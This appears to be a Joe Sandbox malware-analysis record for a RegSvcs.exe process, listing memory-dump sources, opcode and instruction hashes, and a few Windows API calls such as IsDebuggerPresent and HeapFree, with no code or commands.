                                                                • Instruction ID: 86d2d33a91f32b2d3bbb1004b0a4f2ac420e20574d24ac6bb8bf2d230d7cc4eb
                                                                • Opcode Fuzzy Hash: ef60e14e83a7a2f80ee4b4a593447a9f3b614e16a1efb2a15e5b2f2953f84e37
                                                                • Instruction Fuzzy Hash: 502125757082108FCB58AF78E84992E3BFAFF8960071505A9D609CB782CE21EC45C761
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95dcb05503bcc6af681f63ae099d853e1a33f217771c78a100ec7693affaaa2a
                                                                • Instruction ID: 919e72160770c3e9788074f67c38c48bac9bb016ac8140b69d21dab6ce3749ad
                                                                • Opcode Fuzzy Hash: 95dcb05503bcc6af681f63ae099d853e1a33f217771c78a100ec7693affaaa2a
                                                                • Instruction Fuzzy Hash: 8321E075A00205AFCB24DF24D4509AE77BAFB892A4F50C41DD94A9B241DA34EA43CBD2
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d4c71abf3991e7227cd25a571c70e47dac56369cc4a298a000f45a34d35d19ea
                                                                • Instruction ID: 74e63abbd929b3a9f61d2b3e92d5699cb2a6b81c5f7836af071961b236713c88
                                                                • Opcode Fuzzy Hash: d4c71abf3991e7227cd25a571c70e47dac56369cc4a298a000f45a34d35d19ea
                                                                • Instruction Fuzzy Hash: 282100B2604200DFDF25DF14D9C4B2ABFA5FF88314F24C5A9E9094B256C33AD426CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 146d4d6a167177d76ce31ead582de3d167a286f352364ee3e0bfc3d2affbf5ec
                                                                • Instruction ID: 36e4ec91f25a814a3ffe36d98fd0aa9f59763a73c46073e97e741f2a74ab0f6b
                                                                • Opcode Fuzzy Hash: 146d4d6a167177d76ce31ead582de3d167a286f352364ee3e0bfc3d2affbf5ec
                                                                • Instruction Fuzzy Hash: 632130B1500240DFDF24DF14DAC0B27BFA6EF88350F20C169E8098A216C336D856CAA2
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2901534849.000000000278D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0278D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_278d000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 60c6aa2b00b8a8fd9d97539930d98bc419ec5ca84923316c489f91f852c211e6
                                                                • Instruction ID: 5f612d9441dc1efe572a884e8ab972836117c74ca9582c482ba914e8058caeb6
                                                                • Opcode Fuzzy Hash: 60c6aa2b00b8a8fd9d97539930d98bc419ec5ca84923316c489f91f852c211e6
                                                                • Instruction Fuzzy Hash: CC2126B1584204DFDB24EF24D9C4B26BFA5FB88314F24C66DD8094B296C33AD847CB62
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2901534849.000000000278D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0278D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_278d000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f181dd3a23a4631e35ff5fabe3aef57c33dc5c52266bb5b9daed796319519ca6
                                                                • Instruction ID: 75ee08aa74390a258cafc2259fc0fa9106bdf2f5af60ee0e32506b2ab10dccb7
                                                                • Opcode Fuzzy Hash: f181dd3a23a4631e35ff5fabe3aef57c33dc5c52266bb5b9daed796319519ca6
                                                                • Instruction Fuzzy Hash: F82148715493C49FCB139B24D994B11BF71AB46214F29C5DBD8898F2A7C33A980ACB62
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1e830128af082aea0cc5f4dfa88fba4a4c9e2772eefa25ee99f5206504a13dda
                                                                • Instruction ID: e010d2ab3f6faf68bd1d063cd1e14540d30951b47b934ebc82d892d702f9eba9
                                                                • Opcode Fuzzy Hash: 1e830128af082aea0cc5f4dfa88fba4a4c9e2772eefa25ee99f5206504a13dda
                                                                • Instruction Fuzzy Hash: 68115974A055089BCB04DFA8E884ABDBBB5FB88304F548165EA04E7642EB34A841CF61
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 06a81929f819abb94f488e53aee3a9884a5e6dec74972fde0350ba1020022854
                                                                • Instruction ID: 7d47e67ccb81d3466f3f5adfe0e67532f412f0c3b24e6ad8d395342cf3d28007
                                                                • Opcode Fuzzy Hash: 06a81929f819abb94f488e53aee3a9884a5e6dec74972fde0350ba1020022854
                                                                • Instruction Fuzzy Hash: 3A119E363042008FD7549A25E949FAA77EAEF86710F14416DE249CF762CA66E808C751
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f66a191d040b884430ffdcb120849d3f300b30be2bff4c4f66c76ffedff8023c
                                                                • Instruction ID: 9555612196b1921b6a90a6647fd2d5bef43ffce56ce5bacfbfc555f45298b84c
                                                                • Opcode Fuzzy Hash: f66a191d040b884430ffdcb120849d3f300b30be2bff4c4f66c76ffedff8023c
                                                                • Instruction Fuzzy Hash: 34114F753042048FC754DB69E548E6AB7FAFF89721B11846DE24ACF761CA72EC04CB50
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8eda1f2d8f1a456a0daf06e58ae740aa192a96f5aa8ad460ad9ed9a74b0e54c
                                                                • Instruction ID: f4c0e0c14edcf7dd5e587a2e2d25ade3b9d8f36e850879bd6b29f12d65232e01
                                                                • Opcode Fuzzy Hash: d8eda1f2d8f1a456a0daf06e58ae740aa192a96f5aa8ad460ad9ed9a74b0e54c
                                                                • Instruction Fuzzy Hash: 2221E074D4021A8FCB44EFA8D9496EEBBF1EB18300F10522AD805F3250EB305A99CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4c7f8b7e770ae4cd2155b9e62d57b008416f11b96e0295358949b824588ba942
                                                                • Instruction ID: a3cd145acec89f4778bb90a557603ae7e5e410684f2577dc1d1c7e4f7519ae80
                                                                • Opcode Fuzzy Hash: 4c7f8b7e770ae4cd2155b9e62d57b008416f11b96e0295358949b824588ba942
                                                                • Instruction Fuzzy Hash: 84218C76504244DFCF16CF10D9C4B16BF62FB88314F28C5AADD490A656C33AD42ACBA1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                • Instruction ID: c27268bfadd0caba63ed738d98b0ac4f8fac5ac4af4319899d90702233835fa3
                                                                • Opcode Fuzzy Hash: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                • Instruction Fuzzy Hash: 5411AF76504284CFCF16CF10D5C4B16BF62FB84314F24C5A9D8494B256C336D46ACBA1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de348b7185377d11130bd58887e56f42866ca53a65c75258286d5572548f3048
                                                                • Instruction ID: 540ff4d1958260a398732074a8d0da0b7cb267f92cf8c5d3468af2797dc62348
                                                                • Opcode Fuzzy Hash: de348b7185377d11130bd58887e56f42866ca53a65c75258286d5572548f3048
                                                                • Instruction Fuzzy Hash: EE117371E002159FCB54EFB8E4556AEBBF2AB88390B144539E609E7600EB329C458791
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77ae9e711eed7d56a561b6240a90010fae21160005e242ff29063e425469a69a
                                                                • Instruction ID: 0ab55cf49bb5456862f497d78ec649d91e50868acf403ec7e22980f868595be9
                                                                • Opcode Fuzzy Hash: 77ae9e711eed7d56a561b6240a90010fae21160005e242ff29063e425469a69a
                                                                • Instruction Fuzzy Hash: 8C018072D0060C9FCB249F68FD88AAE7BB5FB48350F044529F95A92641DB309925CB90
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90e0b6feca2e6c547a66a56a2afb167292063b40265f1a13f731553dd3321e9e
                                                                • Instruction ID: b45f0e3ec5333cc5d5d7b02d3877b6ad2bb7bbe92a3ac4e2dbfadf40fd9320c2
                                                                • Opcode Fuzzy Hash: 90e0b6feca2e6c547a66a56a2afb167292063b40265f1a13f731553dd3321e9e
                                                                • Instruction Fuzzy Hash: 33014C35E1021DDFCB649F79ED48AAE7FB9FF88350F004429E91A97280DF3099108BA1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a074f5b9f05545f5f08e7ccefbd21f01a9e87eb2ce3efc8d1a334c84c273baef
                                                                • Instruction ID: f3b6ef352fc7e2ddcccf4d631a9a17b998e1ca8dc41d4e38237837fe0b82fb02
                                                                • Opcode Fuzzy Hash: a074f5b9f05545f5f08e7ccefbd21f01a9e87eb2ce3efc8d1a334c84c273baef
                                                                • Instruction Fuzzy Hash: 1601D6715083409EEF308A29CE84B67BFDCEF45328F18C56AED495B286C379D845CAB1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe1343e5a76d8b0fd9cf197dd3febee874057ef6ebb13eed54e96f65a4cbdc09
                                                                • Instruction ID: 2ea8edf8fa6d59b7f32b82ea76a2795b99cfd61bf8daea9e96d6eac4b38390dc
                                                                • Opcode Fuzzy Hash: fe1343e5a76d8b0fd9cf197dd3febee874057ef6ebb13eed54e96f65a4cbdc09
                                                                • Instruction Fuzzy Hash: D301527100D3C05ED7124B258894B52BFB4DF57224F1DC5DBD9888F1A3C3695849C772
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a33c52c748d682b1b25a4602e432ec6e6f29abd8e722057bd066135e8becfad
                                                                • Instruction ID: a176817fdc72a165610ce0882ed1b7b2f6772e5c6a8f6707f1075d5f8487590a
                                                                • Opcode Fuzzy Hash: 8a33c52c748d682b1b25a4602e432ec6e6f29abd8e722057bd066135e8becfad
                                                                • Instruction Fuzzy Hash: 3CF021367103145BCB092678A9095AD7FEEFBC5310F144025F70ACB741CE39CD128355
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 637bf7cdff833fe91d45e73db27a1ec352e0cfeef7e2474f22869515640ca307
                                                                • Instruction ID: 68acb480f2d7089306ee42dbe9a7acd7b478128e74fadd476a1ea8d1f629e38c
                                                                • Opcode Fuzzy Hash: 637bf7cdff833fe91d45e73db27a1ec352e0cfeef7e2474f22869515640ca307
                                                                • Instruction Fuzzy Hash: 8F012974C142598FCB11EFA8D9545EDBFF0FF09314F10066AD946BB650EB305994CB91
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8bb999bf2b9c22cc20404a58fb3b693d3253b148853b86e06b5eec5400be9000
                                                                • Instruction ID: 27180ed254c49c910b6965ee2fec30f1a7b5c477b63d718cd078a12f74cb7eae
                                                                • Opcode Fuzzy Hash: 8bb999bf2b9c22cc20404a58fb3b693d3253b148853b86e06b5eec5400be9000
                                                                • Instruction Fuzzy Hash: BBF02032B046259BCB19976AF0089AEB7EAEFC4270B04007AF209CB750CE32CC028790
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 752db234cdd7d17cd9dfc876761be117a19e2f224a33949890d00b53fc97a410
                                                                • Instruction ID: 19ad1f1d36542551eb6bbe9ed967c54b799629fd956ebda3547bed81a2aba207
                                                                • Opcode Fuzzy Hash: 752db234cdd7d17cd9dfc876761be117a19e2f224a33949890d00b53fc97a410
                                                                • Instruction Fuzzy Hash: A9F05E35300505DFC700CF69D484C6ABBEAFF88724B544069FA098B331CB719C11CB80
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b057116a4c2f79cbe3fc2573d7c3f7a9aaf48e09378c1d222aabd17b35e7f27
                                                                • Instruction ID: 5315258a3252a5aa84263a4e79e76591c55abd51ca5b50dfc70231b0ecccadba
                                                                • Opcode Fuzzy Hash: 3b057116a4c2f79cbe3fc2573d7c3f7a9aaf48e09378c1d222aabd17b35e7f27
                                                                • Instruction Fuzzy Hash: AAF09072A002049FCB91DFB9D9419AFBBF6FF48250710453AD609E3611E7309A15CBE1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 325f2f556362ce0c22fd2971fbbb8cd315fb312678adfddc743684dfe9334596
                                                                • Instruction ID: 19c04007e7f5d67679decad32b54c3a9e2a72a7a90231a82741722ef1d8e955b
                                                                • Opcode Fuzzy Hash: 325f2f556362ce0c22fd2971fbbb8cd315fb312678adfddc743684dfe9334596
                                                                • Instruction Fuzzy Hash: E1F089729002089F8B50DFADD84499FFBF9FB982507404136D609D3611D7709A158BE1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a8e631be5508288dd8f74f1acf09474dbcd6d061b34fcccf8eb926a7718e8ee
                                                                • Instruction ID: 1f96d0d2cf68f9c71767367d89da8ab9a9e98c8945570260f9bec5da7250eb30
                                                                • Opcode Fuzzy Hash: 2a8e631be5508288dd8f74f1acf09474dbcd6d061b34fcccf8eb926a7718e8ee
                                                                • Instruction Fuzzy Hash: 15E06D363041109FC708EB69F549EDCB7B9EF48361B0441AAF60ADBB21CF22E9008B44
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 44952375c791486780146ea76555cc81fc91e0e4bcc170607e17a6f980790b44
                                                                • Instruction ID: 69539a90d233c9ee210d0dcfa6e726950d1685e92446cddaed11afda7f079437
                                                                • Opcode Fuzzy Hash: 44952375c791486780146ea76555cc81fc91e0e4bcc170607e17a6f980790b44
                                                                • Instruction Fuzzy Hash: 66E068B970460CD9CB34EA78B8004EF775DF989170320471EC52B970D1EC26591783D2
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90fed814437746996f8dbdedbda2f577817a3c021326bed55bac4fe68eacae72
                                                                • Instruction ID: 35e54e2729336551e159cf038a0617febd3615abe7672ba3a4909a1ed101e47e
                                                                • Opcode Fuzzy Hash: 90fed814437746996f8dbdedbda2f577817a3c021326bed55bac4fe68eacae72
                                                                • Instruction Fuzzy Hash: 9BE08031D1033B67C710B665DD066DFB734DF91714F84C211D45872141EF30675A8591
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d88cbaa5b9fceee3842a8f3ac02e6a2d26ae2af51e3e38427f20b909147755e5
                                                                • Instruction ID: 90a77ad097d527e467f8536e54afd37974027c29802c5a1b92ba6a1ec52da327
                                                                • Opcode Fuzzy Hash: d88cbaa5b9fceee3842a8f3ac02e6a2d26ae2af51e3e38427f20b909147755e5
                                                                • Instruction Fuzzy Hash: C2E002308B56078BD2642F64B6BC37A7AA8FF1F313B426F14B60E914519F70406CCA75
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7675493bb004c046418953eb7c12d2da7f2736fa76ddd65198bb162f25ce073b
                                                                • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                • Opcode Fuzzy Hash: 7675493bb004c046418953eb7c12d2da7f2736fa76ddd65198bb162f25ce073b
                                                                • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1d0f384dc7338d7ce6a1a381013b79932c8e16e56ff9b47c6eda43ec615e6a6b
                                                                • Instruction ID: 0a6a50754eecc2b9f02a2064de7de360bda0143f9c2e8be687bec087caf4bf13
                                                                • Opcode Fuzzy Hash: 1d0f384dc7338d7ce6a1a381013b79932c8e16e56ff9b47c6eda43ec615e6a6b
                                                                • Instruction Fuzzy Hash: F8E0ED30E0915CCFCB68DB14D91866D73B6FB48281F1005E5D10B1A6A8CBB46DC4CF41
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                • String ID:
                                                                • API String ID: 2579439406-0
                                                                • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$@
                                                                • API String ID: 0-149943524
                                                                • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                                • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                                APIs
                                                                • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$FreeProcess
                                                                • String ID:
                                                                • API String ID: 3859560861-0
                                                                • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: B
                                                                • API String ID: 0-1255198513
                                                                • Opcode ID: 2ca1d61c44cd519fae393cb59dbd37142f329ecdd2267007adcb5ae48c8afa2c
                                                                • Instruction ID: f93c4dfcbe6bd1f1ab8e29a1a6592e90584cb94ad657a4c2bf267a03f1308bec
                                                                • Opcode Fuzzy Hash: 2ca1d61c44cd519fae393cb59dbd37142f329ecdd2267007adcb5ae48c8afa2c
                                                                • Instruction Fuzzy Hash: BD52D431C10B5A8EDB11EF68C854AA9F7B1FF95300F15D6DAE44867221EB70AAD4CF81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: "
                                                                • API String ID: 0-123907689
                                                                • Opcode ID: 51594c02a60bba52e00fcfbb56e5b2f133a12a25a6a01aad0f4e836faf3adf21
                                                                • Instruction ID: 9bc3ffd2c35dd6619297c29122028d9ac2c1f5c6185742c391b823e84ddc5108
                                                                • Opcode Fuzzy Hash: 51594c02a60bba52e00fcfbb56e5b2f133a12a25a6a01aad0f4e836faf3adf21
                                                                • Instruction Fuzzy Hash: A8F10770E002488FDB14CFA9E4947ADBBF2BF88314F24D169E508AB795D7749985CF50
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
